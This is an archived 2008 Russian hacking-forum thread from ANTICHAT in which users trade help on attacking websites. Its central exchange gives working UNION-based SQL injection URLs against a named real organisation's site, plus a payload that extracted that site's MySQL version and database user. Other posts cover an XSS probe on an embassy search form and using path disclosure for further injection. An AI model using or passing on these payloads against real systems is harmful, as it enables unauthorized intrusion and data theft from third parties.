ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
03.04.2008, 21:27
|
|
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме:
99208
Репутация:
21
|
|
Здравствуйте, разесните мне пожалуйста один момент, при сканировании портов утилитой Shadow Security Scanner 7, она показывает что на сервере открыто огромное количество портов, среди них очень много бекдоров, нахожу клиен к бекдору, но не один не коннектится, пробовал на разных сайтах, где открыты эти порты, ни чего не получилось.
XSpyder'ом пробывал сканить, тот вообще не работает, ни трафу не жрет, ни порты не сканирует, только нагрузку на проц создает. Помогите пожалуйста дельным советом.
|
|
|
03.04.2008, 23:07
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Spaise
В чём вопрос то?
XSpyder не работает? Или открытые порты смущают?Огромное кол-во это сколько, и главное какие?С чего ты взял ,что "среди них очень много бекдоров", что за клиент к бекдору?  |
|
|
|
04.04.2008, 01:28
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662
Репутация:
435
|
|
товарисчи напомните как вывести имя бд, для опр. таблицы, schema_name помню, а откуд забыл
|
|
|
|
04.04.2008, 01:40
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
SELECT table_schema FROM information_schema.tables WHERE table_name='imyatablici'
|
|
|
|
04.04.2008, 12:39
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720
Репутация:
141
|
|
Код:
http://www.wfsj.org/projects/page.php?id=-62+union+select+null,null,null,null,null,null,null,null,null,null,null/*
такя проблема есть скуль возникла такая проблема с выводом заначений когда вставляю подставляю int значения
Код:
http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11/*
все норм но если подставляю Что нить типа user или from table возникает ошибка в чем проблема  |
|
|
|
04.04.2008, 12:56
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Пробуй так
Код:
http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),4,5,6,7,8,9,10,11/*
вер. 4.1.7-nt-max
юзер. wfsj@localhost
Прочитать можно тут
http://forum.antichat.ru/showthread.php?t=19605
Да и еще, убери пробелы которые добавил форум.
Удачи.
Последний раз редактировалось Red_Red1; 04.04.2008 в 13:01..
|
|
|
|
04.04.2008, 13:12
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720
Репутация:
141
|
|
спс
|
|
|
|
04.04.2008, 17:57
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056
Репутация:
1089
|
|
вобщем тема такая- защел я на наше посольство зарубежом(по понятным причинам умолчу в которое) и в поиске ввел "><script>alert()</script>
на что мне выдало
вот и возникает у меня вопросс- действительно это скуль? и насколько это опасно в плане IT безопасности (за Родину обидно млин) , мож предупредить их ? |
|
|
|
04.04.2008, 19:10
|
|
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720
Репутация:
141
|
|
я таки думаю что кроме раскрытия путей больше не как и не используешь по крайней мере по скрину
ну это раскрытие может быть полезно если будет скуль с filepriv
Последний раз редактировалось MaSter GeN; 04.04.2008 в 19:14..
|
|
|
|
04.04.2008, 19:13
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
типичная ошибка servlet'a имхо...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид